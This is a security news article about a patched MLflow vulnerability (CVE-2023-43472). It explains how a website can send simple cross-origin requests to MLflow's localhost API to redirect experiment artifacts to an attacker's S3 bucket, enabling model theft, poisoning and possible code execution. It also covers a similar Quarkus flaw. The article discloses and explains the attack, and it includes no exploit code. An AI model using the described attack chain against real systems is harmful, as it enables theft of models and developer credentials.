MLflow vulnerability enables remote machine learning model theft and poisoning

This has been a pivotal year for generative artificial intelligence (AI). The release of large language models (LLMs) have showcased how powerful the technology can be to make business processes more efficient. A lot of organizations are now in a race to adopt generative AI and train models on their own data sets.

Developing and training AI models can be a costly endeavor and they can easily become one of the most valuable assets a company might have. It’s therefore important to keep in mind that these models are susceptible to theft and other attacks, and the systems that host them need to have strong security protections and policies in place.

A recent vulnerability patched in MLflow, an open-source machine-learning lifecycle platform, highlights how easy it could be for attackers to steal or poison sensitive training data when a developer visits a random website on the internet from the same machine where MLflow runs. The flaw, tracked as CVE-2023-43472, was patched in MLflow 2.9.0.

Localhost attacks via rogue JavaScript code

Many developers believe that services bound to localhost — a computer’s internal hostname — cannot be targeted from the internet. However, this is an incorrect assumption according to Joseph Beeton, a senior application security researcher at Contrast Security, who recently held a talk on attacking developer environments through localhost services at the DefCamp security conference.

Beeton recently found serious vulnerabilities in the Quarkus Java framework and MLflow that allow remote attackers to exploit features in the development interfaces or APIs exposed by those applications locally. The attacks would only require the computer user to visit an attacker-controlled website in their browser or a legitimate site where the attacker managed to place specifically crafted ads.

Drive-by attacks have been around for many years, but they are powerful when combined with a cross-site request forgery (CSRF) vulnerability in an application. In the past hackers used drive-by attacks through malicious ads placed on websites to hijack the DNS settings of users’ home routers. Normally, browsers only allow JavaScript code to make requests to resources from the same origin (domain) as the script. A special mechanism called cross-origin resource sharing (CORS) can be used to override this restriction and allow scripts to make requests across different origins if specifically allowed by the target server.

For example, if a piece of JavaScript code loaded inside a browser from domain A tries to make a request to domain B, the browser will first make a so-called preflight request to check if domain B has a CORS policy that allows scripted requests from domain A. While this applies to localhost as well, Beeton points out that there is another type of request called a simple request that is still allowed by most browsers (except Safari) that doesn’t trigger a preflight request because it predates CORS. Such requests are used, for example, by the <form> element from the HTML standard to submit data across origins but can also be triggered from JavaScript.

A simple request can be of the type GET, POST, and HEAD and can have the content type application/x-www-form-urlencoded, multipart/form-data, text/plain, or no content type. Their limitation, however, is that the script making them won’t get any response back unless the target server opts into it through the Access-Control-Allow-Origin header.

From an attack perspective, though, getting a response back is not really required as long as the intended action triggered by the request happens. This is the case for both the MLflow and Quarkus vulnerabilities.

Stealing and poisoning machine-learning models

Once MLflow is installed, its user interface is accessible by default via http://localhost:5000 and supports a REST API through which actions can be performed programmatically. Normally, API interaction would be done through POST requests with a content type of application/JSON, which is not a content type allowed for simple requests.

However, Beeton found that MLflow’s API did not check the content type of requests, allowing requests with a content type of text/plain. In turn, this allows remote cross-origin attacks through the browser via simple requests.

The API has limited functionality such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently, the default experiment in MLflow to which new data will be saved is called “Default,” so attackers can first send a request to rename it to “Old” and then create a new experiment, which will now be called “Default” but have an artifact_uri pointing to an external S3 storage bucket they control.

“Once a new MLFLow run is done — e.g., mlflow run sklearn_elasticnet_wine -P alpha=0.5, experiment-name Default — the result of the run will be uploaded to the S3 bucket,” Beeton explained in a blog post. This would allow the attacker to obtain a serialized version of the ML model as well as the data that was used to train it.

The attacker could take it even further. “Given that an ML model is stored in the bucket, there would be potential to poison the ML model itself,” the researcher said. “In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t.”

Remote code execution can often be achieved

Remote code execution might also be possible if the attacker modifies the model.pkl file to inject a Python pickle exploit. Remote code execution was also the result in the case of the Quarkus vulnerability that Beeton also found and which was also exploitable via Simple Requests from remote websites because the application’s Dev UI was bound to localhost and had no additional protection for cross-site request forgery attacks.

“As I demonstrated during [the] DefCamp talk, it is possible to generate a remote code execution (RCE) on the developer’s machine or on other services on their private network,” the researcher said. “Given that developers have write access to codebases, AWS keys, server credentials, etc., access to the developer’s machine gives an attacker a great deal of scope to pivot to other resources on the network, as well as to either modify or to entirely steal the codebase.”

Generative AI, Vulnerabilities